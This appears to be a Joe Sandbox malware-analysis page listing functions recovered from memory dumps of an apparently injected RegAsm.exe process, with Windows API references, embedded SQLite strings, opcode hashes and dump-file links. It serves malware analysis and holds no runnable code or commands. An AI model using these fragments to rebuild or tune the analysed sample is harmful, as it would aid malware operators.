Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseH_prologHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 1628159694-0
Opcode ID: bb9b71f5e8ec4893d67d55fbca70c56ba30c3264256f5443c6f3ee74202b9b1e
Instruction ID: 08aea404dcaa057e0e9199cf42e56a70b86344994b490b13035dd86d77b496de
Opcode Fuzzy Hash: bb9b71f5e8ec4893d67d55fbca70c56ba30c3264256f5443c6f3ee74202b9b1e
Instruction Fuzzy Hash: FA318072901119ABCB11DFD0CD899EFBB79FF06750F100016F606E6150D7749AC5CBA4

Function 00411CA1 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 36stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(?,00000104,00000001,00000000,?,00412CBB,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00411CAD
lstrcpyn.KERNEL32(00640760,?,00000000,00000104,?,00412CBB,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00411CC6
lstrlenA.KERNEL32(00000104,?,00412CBB,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00411CD8
wsprintfA.USER32 ref: 00411CEA

Strings

%s%s, xrefs: 00411CE4

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 862e4cb0178fb9b4318c1bf297c52207944604ea184238de445fed15d001e561
Instruction ID: 43e2d6013c2e768f3f20f039ab6d4513d7afba91ea69d68aaf08fbe0e5f3b357
Opcode Fuzzy Hash: 862e4cb0178fb9b4318c1bf297c52207944604ea184238de445fed15d001e561
Instruction Fuzzy Hash: 08F0E93620022A7BDB111F999C489DBBF2EEF47669B041022FE0993210CB716954C7E5

Function 0041B6A1 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041B6AD

Part of subcall function 0041B884: __getptd_noexit.LIBCMT ref: 0041B887
Part of subcall function 0041B884: __amsg_exit.LIBCMT ref: 0041B894

__getptd.LIBCMT ref: 0041B6C4
__amsg_exit.LIBCMT ref: 0041B6D2
__lock.LIBCMT ref: 0041B6E2
__updatetlocinfoEx_nolock.LIBCMT ref: 0041B6F6

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: c9dfcfac7ca24222d80135a14f2d32765b75e3e7d016271b71d0ec5a4033ef82
Instruction ID: ef5dc52e7bd3271d847fd346537f8277cf7d4a2d41aa3a0692d6f4c3dc8a43a5
Opcode Fuzzy Hash: c9dfcfac7ca24222d80135a14f2d32765b75e3e7d016271b71d0ec5a4033ef82
Instruction Fuzzy Hash: DEF0C232A416109BDA20BB665803BCD33A0DF10768F64411FE050562D2CB2C49C18ACF

Function 004083D3 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 441stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004083D8

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

lstrlenA.KERNEL32(00000000), ref: 00408927
lstrlenA.KERNEL32(00000000), ref: 0040893B

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00406EF1: _EH_prolog.MSVCRT ref: 00406EF6
Part of subcall function 00406EF1: memcmp.MSVCRT ref: 00406F1C
Part of subcall function 00406EF1: memset.MSVCRT ref: 00406F4B
Part of subcall function 00406EF1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406F80

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

#, xrefs: 0040896B

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrlen$lstrcat$AllocCreateLocalObjectSingleThreadWaitmemcmpmemset
String ID: #
API String ID: 3207582090-1885708031
Opcode ID: effc8aafcbed3aab504db3f9686c6cb41f7a7435c66cf4a857e419bc47173295
Instruction ID: 0541987f1afd671b4e9ef34776029e6948f514961841807f53cc92496833b1ce
Opcode Fuzzy Hash: effc8aafcbed3aab504db3f9686c6cb41f7a7435c66cf4a857e419bc47173295
Instruction Fuzzy Hash: BA124E7180514DEEDB09EBE5C956BEEBB74AF14308F10419EE052621C2DFB827C8DBA5

Function 1B7A73C0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

fts5: syntax error near "%.*s", xrefs: 1B7A751C

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: fts5: syntax error near "%.*s"
API String ID: 0-498961494
Opcode ID: ce2d7da8638c60cbf7f6a73d5a298baef9de6528a5bf43527cf4c35e6f7bb181
Instruction ID: 2fb6bcd32c4d95dfc34d1fea6854fb4342b61c45ff8cc68c17e1ce4a17458608
Opcode Fuzzy Hash: ce2d7da8638c60cbf7f6a73d5a298baef9de6528a5bf43527cf4c35e6f7bb181
Instruction Fuzzy Hash: 5CB1B1B09443529FD794CF34C884B9AFBE8BF44708F484A1EF89A87240D775E585CB96

Function 1B6C13A0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 214COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6C1459
%s at line %d of [%.10s], xrefs: 1B6C1468
database corruption, xrefs: 1B6C1463

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 1b49c94be2be2615470ac84659f4a9f2f69cb07c280b81b9e353a50766909ff5
Instruction ID: d477570f3dd07983055ea448906acb8c23318b39f378dedb179f2b9ce0821a37
Opcode Fuzzy Hash: 1b49c94be2be2615470ac84659f4a9f2f69cb07c280b81b9e353a50766909ff5
Instruction Fuzzy Hash: 417103F6A04301DFC705CF25C881AD7BBE5EF98214F158999F8899B342D730E945CBA1

Function 1B697D30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

winShmMap2, xrefs: 1B697E1F
winShmMap1, xrefs: 1B697DC5
winShmMap3, xrefs: 1B697F1D

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: winShmMap1$winShmMap2$winShmMap3
API String ID: 0-3826999013
Opcode ID: 88109be1829fea503c530448d6ffb5e8508f436d173bcaf17668c4958522dcc0
Instruction ID: 1eccab698c73dc96dc4227f5db56642b77e681480ea63858a56e70b14d8a47fe
Opcode Fuzzy Hash: 88109be1829fea503c530448d6ffb5e8508f436d173bcaf17668c4958522dcc0
Instruction Fuzzy Hash: 6C61E2B55007029FDB14CF25EC85BA7B7E5EF94B04F01486DF98AA7291DB38E809CB52

Function 1B6C3060 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 184COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6C3092
%s at line %d of [%.10s], xrefs: 1B6C30A1
database corruption, xrefs: 1B6C309C

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 981d66ea50b94ce95eebff1c1e7692ff056b99039533b363157978daf947f9fc
Instruction ID: 049b9f68f033e5a292a8c17291a57e8041ebba40ba5b7d1f50c1fac8506c86a6
Opcode Fuzzy Hash: 981d66ea50b94ce95eebff1c1e7692ff056b99039533b363157978daf947f9fc
Instruction Fuzzy Hash: 0C61A3B59043059FCB04DF68C881AABBBE4FF98704F40495DF98997341E735EA45CBA2

Function 1B68DE5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

(subquery-%u), xrefs: 1B68DFB3
(join-%u), xrefs: 1B68DFA1

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: (join-%u)$(subquery-%u)
API String ID: 0-2916047017
Opcode ID: 4461562069c7031df0c6923a95e0d83e9ff4734ce87fb8a56b554a6f8c40112d
Instruction ID: 9e8cf8668d9491616a2c1e9c5cce441e58f202d28a2dca3245533f0c0e9ff104
Opcode Fuzzy Hash: 4461562069c7031df0c6923a95e0d83e9ff4734ce87fb8a56b554a6f8c40112d
Instruction Fuzzy Hash: 3151F4F5A04341DBCF18CF24D885AABB7A1AFB5704F08895DFC9A5B205D731E801CBA1

Function 1B6C35E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6C35EA
%s at line %d of [%.10s], xrefs: 1B6C35F9
misuse, xrefs: 1B6C35F4

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: dc236a126485f08d86e4c28110e65b6d50574dca7cb99f04bbae3ad1e7bfa1fb
Instruction ID: a076d649b5346701da813c7f1d395081dad2b0533957b2fd05ad42b0c824d5ab
Opcode Fuzzy Hash: dc236a126485f08d86e4c28110e65b6d50574dca7cb99f04bbae3ad1e7bfa1fb
Instruction Fuzzy Hash: 6D51DFF1E00311AFCB048F25C8C4A97BBA5FF24724F194269F8599B242D331EA50CBA6

Function 1B7396B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 136COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B7397E0
%s at line %d of [%.10s], xrefs: 1B7397EF
database corruption, xrefs: 1B7397EA

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 52614510e72b40acfc3a68f9d1d64f481a348e4aaf380c84b9896485ff7e3af5
Instruction ID: afffacdda87d5fad638239fa97b6257fdb0b3b1c3df5d03181008294fcbc4139
Opcode Fuzzy Hash: 52614510e72b40acfc3a68f9d1d64f481a348e4aaf380c84b9896485ff7e3af5
Instruction Fuzzy Hash: 134129766057918ED7218F7C94406D7FFE0DF41212F4808AEF2D78B6A3E222E485D7A1

Function 1B805960 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B805976
%s at line %d of [%.10s], xrefs: 1B805985
misuse, xrefs: 1B805980

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: cb516bb8f5b7ba2388271015c1123836f86eebca8083da12c88e792d636d5833
Instruction ID: ea08cb7962bf142187ed3b2fcc3de04280fdd189cc96107509862979ce0a173e
Opcode Fuzzy Hash: cb516bb8f5b7ba2388271015c1123836f86eebca8083da12c88e792d636d5833
Instruction Fuzzy Hash: F9411676D043419FD7108B14DCC1BDAB7E8AF857A0F85056AF8849B201EB39E994D7B2

Function 1B75D2E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 119COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B75D2F7
%s at line %d of [%.10s], xrefs: 1B75D306
database corruption, xrefs: 1B75D301

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 676c9c645d159cb82f0adf01604249b47c3fe17b10e13ae1fcd830eaca8a1e21
Instruction ID: 95414c1a45e75e132a4978f259c11df15026b92562d6d873e9d26bb7e5ee822c
Opcode Fuzzy Hash: 676c9c645d159cb82f0adf01604249b47c3fe17b10e13ae1fcd830eaca8a1e21
Instruction Fuzzy Hash: E73105B6905301AFD7119B14DC01EDFB7E8EF84364F050868F98593252E722F942CBE2

Function 1B6C5390 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6C53FE
%s at line %d of [%.10s], xrefs: 1B6C540D
database corruption, xrefs: 1B6C5408

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
